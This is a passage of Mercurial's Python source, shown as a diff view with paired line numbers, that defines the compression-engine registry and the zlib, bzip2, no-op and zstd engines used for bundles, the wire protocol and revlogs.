3292 (revlogheader, self._revlogheaders[revlogheader]))
3287
3293
3288 if revlogheader:
3294 if revlogheader:
3289 self._revlogheaders[revlogheader] = name
3295 self._revlogheaders[revlogheader] = name
3290
3296
3291 self._engines[name] = engine
3297 self._engines[name] = engine
3292
3298
3293 @property
3299 @property
3294 def supportedbundlenames(self):
3300 def supportedbundlenames(self):
3295 return set(self._bundlenames.keys())
3301 return set(self._bundlenames.keys())
3296
3302
3297 @property
3303 @property
3298 def supportedbundletypes(self):
3304 def supportedbundletypes(self):
3299 return set(self._bundletypes.keys())
3305 return set(self._bundletypes.keys())
3300
3306
3301 def forbundlename(self, bundlename):
3307 def forbundlename(self, bundlename):
3302 """Obtain a compression engine registered to a bundle name.
3308 """Obtain a compression engine registered to a bundle name.
3303
3309
3304 Will raise KeyError if the bundle type isn't registered.
3310 Will raise KeyError if the bundle type isn't registered.
3305
3311
3306 Will abort if the engine is known but not available.
3312 Will abort if the engine is known but not available.
3307 """
3313 """
3308 engine = self._engines[self._bundlenames[bundlename]]
3314 engine = self._engines[self._bundlenames[bundlename]]
3309 if not engine.available():
3315 if not engine.available():
3310 raise error.Abort(_('compression engine %s could not be loaded') %
3316 raise error.Abort(_('compression engine %s could not be loaded') %
3311 engine.name())
3317 engine.name())
3312 return engine
3318 return engine
3313
3319
3314 def forbundletype(self, bundletype):
3320 def forbundletype(self, bundletype):
3315 """Obtain a compression engine registered to a bundle type.
3321 """Obtain a compression engine registered to a bundle type.
3316
3322
3317 Will raise KeyError if the bundle type isn't registered.
3323 Will raise KeyError if the bundle type isn't registered.
3318
3324
3319 Will abort if the engine is known but not available.
3325 Will abort if the engine is known but not available.
3320 """
3326 """
3321 engine = self._engines[self._bundletypes[bundletype]]
3327 engine = self._engines[self._bundletypes[bundletype]]
3322 if not engine.available():
3328 if not engine.available():
3323 raise error.Abort(_('compression engine %s could not be loaded') %
3329 raise error.Abort(_('compression engine %s could not be loaded') %
3324 engine.name())
3330 engine.name())
3325 return engine
3331 return engine
3326
3332
3327 def supportedwireengines(self, role, onlyavailable=True):
3333 def supportedwireengines(self, role, onlyavailable=True):
3328 """Obtain compression engines that support the wire protocol.
3334 """Obtain compression engines that support the wire protocol.
3329
3335
3330 Returns a list of engines in prioritized order, most desired first.
3336 Returns a list of engines in prioritized order, most desired first.
3331
3337
3332 If ``onlyavailable`` is set, filter out engines that can't be
3338 If ``onlyavailable`` is set, filter out engines that can't be
3333 loaded.
3339 loaded.
3334 """
3340 """
3335 assert role in (SERVERROLE, CLIENTROLE)
3341 assert role in (SERVERROLE, CLIENTROLE)
3336
3342
3337 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3343 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3338
3344
3339 engines = [self._engines[e] for e in self._wiretypes.values()]
3345 engines = [self._engines[e] for e in self._wiretypes.values()]
3340 if onlyavailable:
3346 if onlyavailable:
3341 engines = [e for e in engines if e.available()]
3347 engines = [e for e in engines if e.available()]
3342
3348
3343 def getkey(e):
3349 def getkey(e):
3344 # Sort first by priority, highest first. In case of tie, sort
3350 # Sort first by priority, highest first. In case of tie, sort
3345 # alphabetically. This is arbitrary, but ensures output is
3351 # alphabetically. This is arbitrary, but ensures output is
3346 # stable.
3352 # stable.
3347 w = e.wireprotosupport()
3353 w = e.wireprotosupport()
3348 return -1 * getattr(w, attr), w.name
3354 return -1 * getattr(w, attr), w.name
3349
3355
3350 return list(sorted(engines, key=getkey))
3356 return list(sorted(engines, key=getkey))
3351
3357
3352 def forwiretype(self, wiretype):
3358 def forwiretype(self, wiretype):
3353 engine = self._engines[self._wiretypes[wiretype]]
3359 engine = self._engines[self._wiretypes[wiretype]]
3354 if not engine.available():
3360 if not engine.available():
3355 raise error.Abort(_('compression engine %s could not be loaded') %
3361 raise error.Abort(_('compression engine %s could not be loaded') %
3356 engine.name())
3362 engine.name())
3357 return engine
3363 return engine
3358
3364
3359 def forrevlogheader(self, header):
3365 def forrevlogheader(self, header):
3360 """Obtain a compression engine registered to a revlog header.
3366 """Obtain a compression engine registered to a revlog header.
3361
3367
3362 Will raise KeyError if the revlog header value isn't registered.
3368 Will raise KeyError if the revlog header value isn't registered.
3363 """
3369 """
3364 return self._engines[self._revlogheaders[header]]
3370 return self._engines[self._revlogheaders[header]]
3365
3371
3366 compengines = compressormanager()
3372 compengines = compressormanager()
3367
3373
3368 class compressionengine(object):
3374 class compressionengine(object):
3369 """Base class for compression engines.
3375 """Base class for compression engines.
3370
3376
3371 Compression engines must implement the interface defined by this class.
3377 Compression engines must implement the interface defined by this class.
3372 """
3378 """
3373 def name(self):
3379 def name(self):
3374 """Returns the name of the compression engine.
3380 """Returns the name of the compression engine.
3375
3381
3376 This is the key the engine is registered under.
3382 This is the key the engine is registered under.
3377
3383
3378 This method must be implemented.
3384 This method must be implemented.
3379 """
3385 """
3380 raise NotImplementedError()
3386 raise NotImplementedError()
3381
3387
3382 def available(self):
3388 def available(self):
3383 """Whether the compression engine is available.
3389 """Whether the compression engine is available.
3384
3390
3385 The intent of this method is to allow optional compression engines
3391 The intent of this method is to allow optional compression engines
3386 that may not be available in all installations (such as engines relying
3392 that may not be available in all installations (such as engines relying
3387 on C extensions that may not be present).
3393 on C extensions that may not be present).
3388 """
3394 """
3389 return True
3395 return True
3390
3396
3391 def bundletype(self):
3397 def bundletype(self):
3392 """Describes bundle identifiers for this engine.
3398 """Describes bundle identifiers for this engine.
3393
3399
3394 If this compression engine isn't supported for bundles, returns None.
3400 If this compression engine isn't supported for bundles, returns None.
3395
3401
3396 If this engine can be used for bundles, returns a 2-tuple of strings of
3402 If this engine can be used for bundles, returns a 2-tuple of strings of
3397 the user-facing "bundle spec" compression name and an internal
3403 the user-facing "bundle spec" compression name and an internal
3398 identifier used to denote the compression format within bundles. To
3404 identifier used to denote the compression format within bundles. To
3399 exclude the name from external usage, set the first element to ``None``.
3405 exclude the name from external usage, set the first element to ``None``.
3400
3406
3401 If bundle compression is supported, the class must also implement
3407 If bundle compression is supported, the class must also implement
3402 ``compressstream`` and `decompressorreader``.
3408 ``compressstream`` and `decompressorreader``.
3403
3409
3404 The docstring of this method is used in the help system to tell users
3410 The docstring of this method is used in the help system to tell users
3405 about this engine.
3411 about this engine.
3406 """
3412 """
3407 return None
3413 return None
3408
3414
3409 def wireprotosupport(self):
3415 def wireprotosupport(self):
3410 """Declare support for this compression format on the wire protocol.
3416 """Declare support for this compression format on the wire protocol.
3411
3417
3412 If this compression engine isn't supported for compressing wire
3418 If this compression engine isn't supported for compressing wire
3413 protocol payloads, returns None.
3419 protocol payloads, returns None.
3414
3420
3415 Otherwise, returns ``compenginewireprotosupport`` with the following
3421 Otherwise, returns ``compenginewireprotosupport`` with the following
3416 fields:
3422 fields:
3417
3423
3418 * String format identifier
3424 * String format identifier
3419 * Integer priority for the server
3425 * Integer priority for the server
3420 * Integer priority for the client
3426 * Integer priority for the client
3421
3427
3422 The integer priorities are used to order the advertisement of format
3428 The integer priorities are used to order the advertisement of format
3423 support by server and client. The highest integer is advertised
3429 support by server and client. The highest integer is advertised
3424 first. Integers with non-positive values aren't advertised.
3430 first. Integers with non-positive values aren't advertised.
3425
3431
3426 The priority values are somewhat arbitrary and only used for default
3432 The priority values are somewhat arbitrary and only used for default
3427 ordering. The relative order can be changed via config options.
3433 ordering. The relative order can be changed via config options.
3428
3434
3429 If wire protocol compression is supported, the class must also implement
3435 If wire protocol compression is supported, the class must also implement
3430 ``compressstream`` and ``decompressorreader``.
3436 ``compressstream`` and ``decompressorreader``.
3431 """
3437 """
3432 return None
3438 return None
3433
3439
3434 def revlogheader(self):
3440 def revlogheader(self):
3435 """Header added to revlog chunks that identifies this engine.
3441 """Header added to revlog chunks that identifies this engine.
3436
3442
3437 If this engine can be used to compress revlogs, this method should
3443 If this engine can be used to compress revlogs, this method should
3438 return the bytes used to identify chunks compressed with this engine.
3444 return the bytes used to identify chunks compressed with this engine.
3439 Else, the method should return ``None`` to indicate it does not
3445 Else, the method should return ``None`` to indicate it does not
3440 participate in revlog compression.
3446 participate in revlog compression.
3441 """
3447 """
3442 return None
3448 return None
3443
3449
3444 def compressstream(self, it, opts=None):
3450 def compressstream(self, it, opts=None):
3445 """Compress an iterator of chunks.
3451 """Compress an iterator of chunks.
3446
3452
3447 The method receives an iterator (ideally a generator) of chunks of
3453 The method receives an iterator (ideally a generator) of chunks of
3448 bytes to be compressed. It returns an iterator (ideally a generator)
3454 bytes to be compressed. It returns an iterator (ideally a generator)
3449 of bytes of chunks representing the compressed output.
3455 of bytes of chunks representing the compressed output.
3450
3456
3451 Optionally accepts an argument defining how to perform compression.
3457 Optionally accepts an argument defining how to perform compression.
3452 Each engine treats this argument differently.
3458 Each engine treats this argument differently.
3453 """
3459 """
3454 raise NotImplementedError()
3460 raise NotImplementedError()
3455
3461
3456 def decompressorreader(self, fh):
3462 def decompressorreader(self, fh):
3457 """Perform decompression on a file object.
3463 """Perform decompression on a file object.
3458
3464
3459 Argument is an object with a ``read(size)`` method that returns
3465 Argument is an object with a ``read(size)`` method that returns
3460 compressed data. Return value is an object with a ``read(size)`` that
3466 compressed data. Return value is an object with a ``read(size)`` that
3461 returns uncompressed data.
3467 returns uncompressed data.
3462 """
3468 """
3463 raise NotImplementedError()
3469 raise NotImplementedError()
3464
3470
3465 def revlogcompressor(self, opts=None):
3471 def revlogcompressor(self, opts=None):
3466 """Obtain an object that can be used to compress revlog entries.
3472 """Obtain an object that can be used to compress revlog entries.
3467
3473
3468 The object has a ``compress(data)`` method that compresses binary
3474 The object has a ``compress(data)`` method that compresses binary
3469 data. This method returns compressed binary data or ``None`` if
3475 data. This method returns compressed binary data or ``None`` if
3470 the data could not be compressed (too small, not compressible, etc).
3476 the data could not be compressed (too small, not compressible, etc).
3471 The returned data should have a header uniquely identifying this
3477 The returned data should have a header uniquely identifying this
3472 compression format so decompression can be routed to this engine.
3478 compression format so decompression can be routed to this engine.
3473 This header should be identified by the ``revlogheader()`` return
3479 This header should be identified by the ``revlogheader()`` return
3474 value.
3480 value.
3475
3481
3476 The object has a ``decompress(data)`` method that decompresses
3482 The object has a ``decompress(data)`` method that decompresses
3477 data. The method will only be called if ``data`` begins with
3483 data. The method will only be called if ``data`` begins with
3478 ``revlogheader()``. The method should return the raw, uncompressed
3484 ``revlogheader()``. The method should return the raw, uncompressed
3479 data or raise a ``StorageError``.
3485 data or raise a ``StorageError``.
3480
3486
3481 The object is reusable but is not thread safe.
3487 The object is reusable but is not thread safe.
3482 """
3488 """
3483 raise NotImplementedError()
3489 raise NotImplementedError()
3484
3490
3485 class _CompressedStreamReader(object):
3491 class _CompressedStreamReader(object):
3486 def __init__(self, fh):
3492 def __init__(self, fh):
3487 if safehasattr(fh, 'unbufferedread'):
3493 if safehasattr(fh, 'unbufferedread'):
3488 self._reader = fh.unbufferedread
3494 self._reader = fh.unbufferedread
3489 else:
3495 else:
3490 self._reader = fh.read
3496 self._reader = fh.read
3491 self._pending = []
3497 self._pending = []
3492 self._pos = 0
3498 self._pos = 0
3493 self._eof = False
3499 self._eof = False
3494
3500
3495 def _decompress(self, chunk):
3501 def _decompress(self, chunk):
3496 raise NotImplementedError()
3502 raise NotImplementedError()
3497
3503
3498 def read(self, l):
3504 def read(self, l):
3499 buf = []
3505 buf = []
3500 while True:
3506 while True:
3501 while self._pending:
3507 while self._pending:
3502 if len(self._pending[0]) > l + self._pos:
3508 if len(self._pending[0]) > l + self._pos:
3503 newbuf = self._pending[0]
3509 newbuf = self._pending[0]
3504 buf.append(newbuf[self._pos:self._pos + l])
3510 buf.append(newbuf[self._pos:self._pos + l])
3505 self._pos += l
3511 self._pos += l
3506 return ''.join(buf)
3512 return ''.join(buf)
3507
3513
3508 newbuf = self._pending.pop(0)
3514 newbuf = self._pending.pop(0)
3509 if self._pos:
3515 if self._pos:
3510 buf.append(newbuf[self._pos:])
3516 buf.append(newbuf[self._pos:])
3511 l -= len(newbuf) - self._pos
3517 l -= len(newbuf) - self._pos
3512 else:
3518 else:
3513 buf.append(newbuf)
3519 buf.append(newbuf)
3514 l -= len(newbuf)
3520 l -= len(newbuf)
3515 self._pos = 0
3521 self._pos = 0
3516
3522
3517 if self._eof:
3523 if self._eof:
3518 return ''.join(buf)
3524 return ''.join(buf)
3519 chunk = self._reader(65536)
3525 chunk = self._reader(65536)
3520 self._decompress(chunk)
3526 self._decompress(chunk)
3521 if not chunk and not self._pending and not self._eof:
3527 if not chunk and not self._pending and not self._eof:
3522 # No progress and no new data, bail out
3528 # No progress and no new data, bail out
3523 return ''.join(buf)
3529 return ''.join(buf)
3524
3530
3525 class _GzipCompressedStreamReader(_CompressedStreamReader):
3531 class _GzipCompressedStreamReader(_CompressedStreamReader):
3526 def __init__(self, fh):
3532 def __init__(self, fh):
3527 super(_GzipCompressedStreamReader, self).__init__(fh)
3533 super(_GzipCompressedStreamReader, self).__init__(fh)
3528 self._decompobj = zlib.decompressobj()
3534 self._decompobj = zlib.decompressobj()
3529 def _decompress(self, chunk):
3535 def _decompress(self, chunk):
3530 newbuf = self._decompobj.decompress(chunk)
3536 newbuf = self._decompobj.decompress(chunk)
3531 if newbuf:
3537 if newbuf:
3532 self._pending.append(newbuf)
3538 self._pending.append(newbuf)
3533 d = self._decompobj.copy()
3539 d = self._decompobj.copy()
3534 try:
3540 try:
3535 d.decompress('x')
3541 d.decompress('x')
3536 d.flush()
3542 d.flush()
3537 if d.unused_data == 'x':
3543 if d.unused_data == 'x':
3538 self._eof = True
3544 self._eof = True
3539 except zlib.error:
3545 except zlib.error:
3540 pass
3546 pass
3541
3547
3542 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3548 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3543 def __init__(self, fh):
3549 def __init__(self, fh):
3544 super(_BZ2CompressedStreamReader, self).__init__(fh)
3550 super(_BZ2CompressedStreamReader, self).__init__(fh)
3545 self._decompobj = bz2.BZ2Decompressor()
3551 self._decompobj = bz2.BZ2Decompressor()
3546 def _decompress(self, chunk):
3552 def _decompress(self, chunk):
3547 newbuf = self._decompobj.decompress(chunk)
3553 newbuf = self._decompobj.decompress(chunk)
3548 if newbuf:
3554 if newbuf:
3549 self._pending.append(newbuf)
3555 self._pending.append(newbuf)
3550 try:
3556 try:
3551 while True:
3557 while True:
3552 newbuf = self._decompobj.decompress('')
3558 newbuf = self._decompobj.decompress('')
3553 if newbuf:
3559 if newbuf:
3554 self._pending.append(newbuf)
3560 self._pending.append(newbuf)
3555 else:
3561 else:
3556 break
3562 break
3557 except EOFError:
3563 except EOFError:
3558 self._eof = True
3564 self._eof = True
3559
3565
3560 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3566 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3561 def __init__(self, fh):
3567 def __init__(self, fh):
3562 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3568 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3563 newbuf = self._decompobj.decompress('BZ')
3569 newbuf = self._decompobj.decompress('BZ')
3564 if newbuf:
3570 if newbuf:
3565 self._pending.append(newbuf)
3571 self._pending.append(newbuf)
3566
3572
3567 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3573 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3568 def __init__(self, fh, zstd):
3574 def __init__(self, fh, zstd):
3569 super(_ZstdCompressedStreamReader, self).__init__(fh)
3575 super(_ZstdCompressedStreamReader, self).__init__(fh)
3570 self._zstd = zstd
3576 self._zstd = zstd
3571 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3577 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3572 def _decompress(self, chunk):
3578 def _decompress(self, chunk):
3573 newbuf = self._decompobj.decompress(chunk)
3579 newbuf = self._decompobj.decompress(chunk)
3574 if newbuf:
3580 if newbuf:
3575 self._pending.append(newbuf)
3581 self._pending.append(newbuf)
3576 try:
3582 try:
3577 while True:
3583 while True:
3578 newbuf = self._decompobj.decompress('')
3584 newbuf = self._decompobj.decompress('')
3579 if newbuf:
3585 if newbuf:
3580 self._pending.append(newbuf)
3586 self._pending.append(newbuf)
3581 else:
3587 else:
3582 break
3588 break
3583 except self._zstd.ZstdError:
3589 except self._zstd.ZstdError:
3584 self._eof = True
3590 self._eof = True
3585
3591
3586 class _zlibengine(compressionengine):
3592 class _zlibengine(compressionengine):
3587 def name(self):
3593 def name(self):
3588 return 'zlib'
3594 return 'zlib'
3589
3595
3590 def bundletype(self):
3596 def bundletype(self):
3591 """zlib compression using the DEFLATE algorithm.
3597 """zlib compression using the DEFLATE algorithm.
3592
3598
3593 All Mercurial clients should support this format. The compression
3599 All Mercurial clients should support this format. The compression
3594 algorithm strikes a reasonable balance between compression ratio
3600 algorithm strikes a reasonable balance between compression ratio
3595 and size.
3601 and size.
3596 """
3602 """
3597 return 'gzip', 'GZ'
3603 return 'gzip', 'GZ'
3598
3604
3599 def wireprotosupport(self):
3605 def wireprotosupport(self):
3600 return compewireprotosupport('zlib', 20, 20)
3606 return compewireprotosupport('zlib', 20, 20)
3601
3607
3602 def revlogheader(self):
3608 def revlogheader(self):
3603 return 'x'
3609 return 'x'
3604
3610
3605 def compressstream(self, it, opts=None):
3611 def compressstream(self, it, opts=None):
3606 opts = opts or {}
3612 opts = opts or {}
3607
3613
3608 z = zlib.compressobj(opts.get('level', -1))
3614 z = zlib.compressobj(opts.get('level', -1))
3609 for chunk in it:
3615 for chunk in it:
3610 data = z.compress(chunk)
3616 data = z.compress(chunk)
3611 # Not all calls to compress emit data. It is cheaper to inspect
3617 # Not all calls to compress emit data. It is cheaper to inspect
3612 # here than to feed empty chunks through generator.
3618 # here than to feed empty chunks through generator.
3613 if data:
3619 if data:
3614 yield data
3620 yield data
3615
3621
3616 yield z.flush()
3622 yield z.flush()
3617
3623
3618 def decompressorreader(self, fh):
3624 def decompressorreader(self, fh):
3619 return _GzipCompressedStreamReader(fh)
3625 return _GzipCompressedStreamReader(fh)
3620
3626
3621 class zlibrevlogcompressor(object):
3627 class zlibrevlogcompressor(object):
3622 def compress(self, data):
3628 def compress(self, data):
3623 insize = len(data)
3629 insize = len(data)
3624 # Caller handles empty input case.
3630 # Caller handles empty input case.
3625 assert insize > 0
3631 assert insize > 0
3626
3632
3627 if insize < 44:
3633 if insize < 44:
3628 return None
3634 return None
3629
3635
3630 elif insize <= 1000000:
3636 elif insize <= 1000000:
3631 compressed = zlib.compress(data)
3637 compressed = zlib.compress(data)
3632 if len(compressed) < insize:
3638 if len(compressed) < insize:
3633 return compressed
3639 return compressed
3634 return None
3640 return None
3635
3641
3636 # zlib makes an internal copy of the input buffer, doubling
3642 # zlib makes an internal copy of the input buffer, doubling
3637 # memory usage for large inputs. So do streaming compression
3643 # memory usage for large inputs. So do streaming compression
3638 # on large inputs.
3644 # on large inputs.
3639 else:
3645 else:
3640 z = zlib.compressobj()
3646 z = zlib.compressobj()
3641 parts = []
3647 parts = []
3642 pos = 0
3648 pos = 0
3643 while pos < insize:
3649 while pos < insize:
3644 pos2 = pos + 2**20
3650 pos2 = pos + 2**20
3645 parts.append(z.compress(data[pos:pos2]))
3651 parts.append(z.compress(data[pos:pos2]))
3646 pos = pos2
3652 pos = pos2
3647 parts.append(z.flush())
3653 parts.append(z.flush())
3648
3654
3649 if sum(map(len, parts)) < insize:
3655 if sum(map(len, parts)) < insize:
3650 return ''.join(parts)
3656 return ''.join(parts)
3651 return None
3657 return None
3652
3658
3653 def decompress(self, data):
3659 def decompress(self, data):
3654 try:
3660 try:
3655 return zlib.decompress(data)
3661 return zlib.decompress(data)
3656 except zlib.error as e:
3662 except zlib.error as e:
3657 raise error.StorageError(_('revlog decompress error: %s') %
3663 raise error.StorageError(_('revlog decompress error: %s') %
3658 stringutil.forcebytestr(e))
3664 stringutil.forcebytestr(e))
3659
3665
3660 def revlogcompressor(self, opts=None):
3666 def revlogcompressor(self, opts=None):
3661 return self.zlibrevlogcompressor()
3667 return self.zlibrevlogcompressor()
3662
3668
3663 compengines.register(_zlibengine())
3669 compengines.register(_zlibengine())
3664
3670
3665 class _bz2engine(compressionengine):
3671 class _bz2engine(compressionengine):
3666 def name(self):
3672 def name(self):
3667 return 'bz2'
3673 return 'bz2'
3668
3674
3669 def bundletype(self):
3675 def bundletype(self):
3670 """An algorithm that produces smaller bundles than ``gzip``.
3676 """An algorithm that produces smaller bundles than ``gzip``.
3671
3677
3672 All Mercurial clients should support this format.
3678 All Mercurial clients should support this format.
3673
3679
3674 This engine will likely produce smaller bundles than ``gzip`` but
3680 This engine will likely produce smaller bundles than ``gzip`` but
3675 will be significantly slower, both during compression and
3681 will be significantly slower, both during compression and
3676 decompression.
3682 decompression.
3677
3683
3678 If available, the ``zstd`` engine can yield similar or better
3684 If available, the ``zstd`` engine can yield similar or better
3679 compression at much higher speeds.
3685 compression at much higher speeds.
3680 """
3686 """
3681 return 'bzip2', 'BZ'
3687 return 'bzip2', 'BZ'
3682
3688
3683 # We declare a protocol name but don't advertise by default because
3689 # We declare a protocol name but don't advertise by default because
3684 # it is slow.
3690 # it is slow.
3685 def wireprotosupport(self):
3691 def wireprotosupport(self):
3686 return compewireprotosupport('bzip2', 0, 0)
3692 return compewireprotosupport('bzip2', 0, 0)
3687
3693
3688 def compressstream(self, it, opts=None):
3694 def compressstream(self, it, opts=None):
3689 opts = opts or {}
3695 opts = opts or {}
3690 z = bz2.BZ2Compressor(opts.get('level', 9))
3696 z = bz2.BZ2Compressor(opts.get('level', 9))
3691 for chunk in it:
3697 for chunk in it:
3692 data = z.compress(chunk)
3698 data = z.compress(chunk)
3693 if data:
3699 if data:
3694 yield data
3700 yield data
3695
3701
3696 yield z.flush()
3702 yield z.flush()
3697
3703
3698 def decompressorreader(self, fh):
3704 def decompressorreader(self, fh):
3699 return _BZ2CompressedStreamReader(fh)
3705 return _BZ2CompressedStreamReader(fh)
3700
3706
3701 compengines.register(_bz2engine())
3707 compengines.register(_bz2engine())
3702
3708
3703 class _truncatedbz2engine(compressionengine):
3709 class _truncatedbz2engine(compressionengine):
3704 def name(self):
3710 def name(self):
3705 return 'bz2truncated'
3711 return 'bz2truncated'
3706
3712
3707 def bundletype(self):
3713 def bundletype(self):
3708 return None, '_truncatedBZ'
3714 return None, '_truncatedBZ'
3709
3715
3710 # We don't implement compressstream because it is hackily handled elsewhere.
3716 # We don't implement compressstream because it is hackily handled elsewhere.
3711
3717
3712 def decompressorreader(self, fh):
3718 def decompressorreader(self, fh):
3713 return _TruncatedBZ2CompressedStreamReader(fh)
3719 return _TruncatedBZ2CompressedStreamReader(fh)
3714
3720
3715 compengines.register(_truncatedbz2engine())
3721 compengines.register(_truncatedbz2engine())
3716
3722
3717 class _noopengine(compressionengine):
3723 class _noopengine(compressionengine):
3718 def name(self):
3724 def name(self):
3719 return 'none'
3725 return 'none'
3720
3726
3721 def bundletype(self):
3727 def bundletype(self):
3722 """No compression is performed.
3728 """No compression is performed.
3723
3729
3724 Use this compression engine to explicitly disable compression.
3730 Use this compression engine to explicitly disable compression.
3725 """
3731 """
3726 return 'none', 'UN'
3732 return 'none', 'UN'
3727
3733
3728 # Clients always support uncompressed payloads. Servers don't because
3734 # Clients always support uncompressed payloads. Servers don't because
3729 # unless you are on a fast network, uncompressed payloads can easily
3735 # unless you are on a fast network, uncompressed payloads can easily
3730 # saturate your network pipe.
3736 # saturate your network pipe.
3731 def wireprotosupport(self):
3737 def wireprotosupport(self):
3732 return compewireprotosupport('none', 0, 10)
3738 return compewireprotosupport('none', 0, 10)
3733
3739
3734 # We don't implement revlogheader because it is handled specially
3740 # We don't implement revlogheader because it is handled specially
3735 # in the revlog class.
3741 # in the revlog class.
3736
3742
3737 def compressstream(self, it, opts=None):
3743 def compressstream(self, it, opts=None):
3738 return it
3744 return it
3739
3745
3740 def decompressorreader(self, fh):
3746 def decompressorreader(self, fh):
3741 return fh
3747 return fh
3742
3748
3743 class nooprevlogcompressor(object):
3749 class nooprevlogcompressor(object):
3744 def compress(self, data):
3750 def compress(self, data):
3745 return None
3751 return None
3746
3752
3747 def revlogcompressor(self, opts=None):
3753 def revlogcompressor(self, opts=None):
3748 return self.nooprevlogcompressor()
3754 return self.nooprevlogcompressor()
3749
3755
3750 compengines.register(_noopengine())
3756 compengines.register(_noopengine())
3751
3757
3752 class _zstdengine(compressionengine):
3758 class _zstdengine(compressionengine):
3753 def name(self):
3759 def name(self):
3754 return 'zstd'
3760 return 'zstd'
3755
3761
3756 @propertycache
3762 @propertycache
3757 def _module(self):
3763 def _module(self):
3758 # Not all installs have the zstd module available. So defer importing
3764 # Not all installs have the zstd module available. So defer importing
3759 # until first access.
3765 # until first access.
3760 try:
3766 try:
3761 from . import zstd
3767 from . import zstd
3762 # Force delayed import.
3768 # Force delayed import.
3763 zstd.__version__
3769 zstd.__version__
3764 return zstd
3770 return zstd
3765 except ImportError:
3771 except ImportError:
3766 return None
3772 return None
3767
3773
3768 def available(self):
3774 def available(self):
3769 return bool(self._module)
3775 return bool(self._module)
3770
3776
3771 def bundletype(self):
3777 def bundletype(self):
3772 """A modern compression algorithm that is fast and highly flexible.
3778 """A modern compression algorithm that is fast and highly flexible.
3773
3779
3774 Only supported by Mercurial 4.1 and newer clients.
3780 Only supported by Mercurial 4.1 and newer clients.
3775
3781
3776 With the default settings, zstd compression is both faster and yields
3782 With the default settings, zstd compression is both faster and yields
3777 better compression than ``gzip``. It also frequently yields better
3783 better compression than ``gzip``. It also frequently yields better
3778 compression than ``bzip2`` while operating at much higher speeds.
3784 compression than ``bzip2`` while operating at much higher speeds.
3779
3785
3780 If this engine is available and backwards compatibility is not a
3786 If this engine is available and backwards compatibility is not a
3781 concern, it is likely the best available engine.
3787 concern, it is likely the best available engine.
3782 """
3788 """
3783 return 'zstd', 'ZS'
3789 return 'zstd', 'ZS'
3784
3790
3785 def wireprotosupport(self):
3791 def wireprotosupport(self):
3786 return compewireprotosupport('zstd', 50, 50)
3792 return compewireprotosupport('zstd', 50, 50)
3787
3793
3788 def revlogheader(self):
3794 def revlogheader(self):
3789 return '\x28'
3795 return '\x28'
3790
3796
3791 def compressstream(self, it, opts=None):
3797 def compressstream(self, it, opts=None):
3792 opts = opts or {}
3798 opts = opts or {}
3793 # zstd level 3 is almost always significantly faster than zlib
3799 # zstd level 3 is almost always significantly faster than zlib
3794 # while providing no worse compression. It strikes a good balance
3800 # while providing no worse compression. It strikes a good balance
3795 # between speed and compression.
3801 # between speed and compression.
3796 level = opts.get('level', 3)
3802 level = opts.get('level', 3)
3797
3803
3798 zstd = self._module
3804 zstd = self._module
3799 z = zstd.ZstdCompressor(level=level).compressobj()
3805 z = zstd.ZstdCompressor(level=level).compressobj()
3800 for chunk in it:
3806 for chunk in it:
3801 data = z.compress(chunk)
3807 data = z.compress(chunk)
3802 if data:
3808 if data:
3803 yield data
3809 yield data
3804
3810
3805 yield z.flush()
3811 yield z.flush()
3806
3812
3807 def decompressorreader(self, fh):
3813 def decompressorreader(self, fh):
3808 return _ZstdCompressedStreamReader(fh, self._module)
3814 return _ZstdCompressedStreamReader(fh, self._module)
3809
3815
3810 class zstdrevlogcompressor(object):
3816 class zstdrevlogcompressor(object):
3811 def __init__(self, zstd, level=3):
3817 def __init__(self, zstd, level=3):
3812 # TODO consider omitting frame magic to save 4 bytes.
3818 # TODO consider omitting frame magic to save 4 bytes.
3813 # This writes content sizes into the frame header. That is
3819 # This writes content sizes into the frame header. That is
3814 # extra storage. But it allows a correct size memory allocation
3820 # extra storage. But it allows a correct size memory allocation
3815 # to hold the result.
3821 # to hold the result.
3816 self._cctx = zstd.ZstdCompressor(level=level)
3822 self._cctx = zstd.ZstdCompressor(level=level)
3817 self._dctx = zstd.ZstdDecompressor()
3823 self._dctx = zstd.ZstdDecompressor()
3818 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3824 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3819 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3825 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3820
3826
3821 def compress(self, data):
3827 def compress(self, data):
3822 insize = len(data)
3828 insize = len(data)
3823 # Caller handles empty input case.
3829 # Caller handles empty input case.
3824 assert insize > 0
3830 assert insize > 0
3825
3831
3826 if insize < 50:
3832 if insize < 50:
3827 return None
3833 return None
3828
3834
3829 elif insize <= 1000000:
3835 elif insize <= 1000000:
3830 compressed = self._cctx.compress(data)
3836 compressed = self._cctx.compress(data)
3831 if len(compressed) < insize:
3837 if len(compressed) < insize:
3832 return compressed
3838 return compressed
3833 return None
3839 return None
3834 else:
3840 else:
3835 z = self._cctx.compressobj()
3841 z = self._cctx.compressobj()
3836 chunks = []
3842 chunks = []
3837 pos = 0
3843 pos = 0
3838 while pos < insize:
3844 while pos < insize:
3839 pos2 = pos + self._compinsize
3845 pos2 = pos + self._compinsize
3840 chunk = z.compress(data[pos:pos2])
3846 chunk = z.compress(data[pos:pos2])
3841 if chunk:
3847 if chunk:
3842 chunks.append(chunk)
3848 chunks.append(chunk)
3843 pos = pos2
3849 pos = pos2
3844 chunks.append(z.flush())
3850 chunks.append(z.flush())
3845
3851
3846 if sum(map(len, chunks)) < insize:
3852 if sum(map(len, chunks)) < insize:
3847 return ''.join(chunks)
3853 return ''.join(chunks)
3848 return None
3854 return None
3849
3855
3850 def decompress(self, data):
3856 def decompress(self, data):
3851 insize = len(data)
3857 insize = len(data)
3852
3858
3853 try:
3859 try:
3854 # This was measured to be faster than other streaming
3860 # This was measured to be faster than other streaming
3855 # decompressors.
3861 # decompressors.
